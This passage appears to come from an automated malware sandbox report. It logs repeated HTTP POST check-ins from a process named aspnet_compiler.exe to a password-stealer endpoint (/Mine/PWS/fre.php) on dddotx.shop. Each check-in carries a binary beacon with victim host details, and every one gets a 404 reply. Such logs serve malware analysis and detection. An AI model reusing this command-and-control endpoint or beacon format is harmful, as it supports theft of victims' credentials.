              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=34ibHf9PrCXy%2BELJbb9G9c7ndIXNX73s%2BXtZ8pDB20PlRVPGqPN8%2BZN43I0IU%2FI9fQA3NRqKeESoQcYV46OHvK9h9bnutrrR%2BrKI0xNB0TMDQOzeXOtgkiJdFUzKhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997974bde0f79-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              53192.168.2.749757188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:57.167869091 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:57.172763109 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:58.849462032 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:57 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ky0PoQYIU4RLi%2BNCf0D3WShYNRTT3zeFSHuO3qC4GBjh11ogvCcFv2dICnJrTduycO4TLfTQXJvDXtXrOX49qXgJkycNZU0i25t%2BMgIFQk4wPtSOgoMS0qQklTqlHg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89979cc925440b-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.
              Sep 25, 2024 10:19:58.849621058 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:57 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ky0PoQYIU4RLi%2BNCf0D3WShYNRTT3zeFSHuO3qC4GBjh11ogvCcFv2dICnJrTduycO4TLfTQXJvDXtXrOX49qXgJkycNZU0i25t%2BMgIFQk4wPtSOgoMS0qQklTqlHg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89979cc925440b-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.
              Sep 25, 2024 10:19:58.849971056 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:57 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ky0PoQYIU4RLi%2BNCf0D3WShYNRTT3zeFSHuO3qC4GBjh11ogvCcFv2dICnJrTduycO4TLfTQXJvDXtXrOX49qXgJkycNZU0i25t%2BMgIFQk4wPtSOgoMS0qQklTqlHg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89979cc925440b-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              54192.168.2.749758188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:58.995986938 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:59.000978947 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:59.725168943 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:59 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k6WitqmhZ8B%2BGSEZW3acKw2YebenkInm4A6l%2FRw1r1v3ORGXgrxFQOowlwRftVc2h3lh6nIxgaloZKn5H40s7iumQlbRlQ3GeR80kzTmDA7BsYDFVch%2BmoSXNqfFvA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997a858224233-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              55192.168.2.749759188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:59.886976004 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:59.891904116 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:00.560081959 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:00 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WChi1QIXX61JfiULSjt%2Bq3ACHNz9ME3BMx3yyDRgRFzOxjiBToLkuYk%2FiZ1sadCZYt2DoxqEMvmbRtSmC5AAQ4AFxlrEIBr2fwH4ZmP8gS07MLEd24e23kTM1socAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997adcbb64249-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              56192.168.2.749760188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:00.714145899 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:00.718977928 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:01.361571074 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:01 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PlsQnQO8WvCZphPefhKVGmPnEqyp72RBVLH8v9697SDb%2BBImQb64F2QxLdIZR7q%2BqFY5zRiuOA5Tz1UsyxB80IF84GImJUmvb0vfBrYq4sBvKgzGyJY5sioLyGcbKw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997b2f83b42ce-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              57192.168.2.749761188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:01.519893885 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:01.526168108 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:02.228873014 CEST563INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:02 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2BhNEt4n1rZLkJ5EAQ3gmHLJpt%2FxMUbwZEQ7pqSkHjgBeoFR5S8JhlswTUqbDtqVBbVM5GW3jtH81ZW9P1elEEqFwNowcoZePh3DcAtzQ5d6cxJ9liRIK99jcJHR6A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997b809f28c3c-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              58192.168.2.749763188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:02.387046099 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:02.392071009 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:03.088596106 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:03 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JxzI6dJOPblceUM0Sw9csJrys%2FR7CZbli8EHLwvK3x%2BeM9wr2EKrj2pLznelU7Jinf6wsMQyVYKy8S2GvgAC7TpMPJj6VkcMvc%2B08weUXzjQf8Ph5xirH9WnboBpDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997bd6d574405-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              59192.168.2.749764188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:03.252350092 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:03.257255077 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:03.904649973 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:03 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DeVZ0oj4nYJ8MLBHrQG8htA1ikp6XmZPNSYl1wAib9tpWKaxrLh6zlmnNRcs9o8X1Z3FdygztPbc%2F5iCoXc5GsviFIU3vz5wPfLI8GfcU1JjRZ9zxXJo%2FGFCPoMbxA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997c2dd7042cf-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              60192.168.2.749765188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:04.065716028 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:04.071219921 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:04.881788015 CEST593INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:04 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LIAL0HIKAWve80VQ3bHdUWWkmCfFm5nbWLedkWKLzxv9S8JP7GNSDdyhUFczQ7i6MMBgw1ZzKMev0R75CJTCLYUWCLi6DLkC8RTg84TwCfXMT2ibYaIbPXuWVT%2Fhig%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997c7ebc7c344-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              61192.168.2.749766188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:05.025248051 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:05.030103922 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:05.709095001 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:05 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=165xciF3CIJeGmb2pMxMrN4FuyFtk6oyTO%2FF%2FKdOw4eY9yUaJSFCm%2Bbv1fQU8FO3LVnwRen%2Fk045rTdCu1eetQvBlaZiNJcuUyEUIweHCfUaKtTTBKVWr3na5CuKsg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997cdfe5c43a5-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              62192.168.2.749767188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:05.853837013 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:05.858736992 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:06.566374063 CEST573INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:06 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O32TioDNtasVS2zWW8vsQkjS1Q7k6Zx8rZPaPbR%2FBLMpNZ%2Bz5%2FspvnkcIR5R7eIN4XBD%2FNN2h00wdckMkryOlB51OS6PCgC6cgQ758wUDzxEGSzs%2BoY2pG%2Fk49y7TQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997d3094743b9-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              63192.168.2.749768188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:06.713376999 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:06.718238115 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:07.429567099 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:07 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KbcYUiQrMXMEMZxI6XpM3JESCeQKRpvjmquP9K3BSFaROxnKWUcmcIzcBBKb7F6Mlv2T2d2EKHsK74KGue09hY%2BCBnBTqQkoVJ9nDDrMCNgTmQS%2BLYh%2BrlRKTOod6A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997d879760cc8-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              64192.168.2.749769188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:07.577991962 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:07.582940102 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:09.278275013 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:09 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qk4FnnBREqj3QBzsmkJkbsdGi9Aw0HEt%2BYBpdA0bPMY%2BVkJL5mAawI6dyUyl3oSE%2BcmIsIiA6vUgej2oMfPzAYEldfmoMYcEnlL0iIlImzRrYCdJc%2B4Tf7R6B5Cmnw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997ddeb31432c-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              65192.168.2.749770188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:09.436377048 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:09.443638086 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:10.191735029 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:10 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mqchNe6mBEI8bNJjwbOFcHJzqv2%2BzSHsgUG52AUzOx%2BXnsSfluMUZEhDHrN0kF5MrncuYXknYahfY33xLEwcJCUPe%2BjZErolxFcaf1YAcoh87yIXElzTkNuegYj91A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997e979f042cb-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              66192.168.2.749771188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:10.338665962 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:10.343573093 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:11.008219957 CEST595INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:10 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
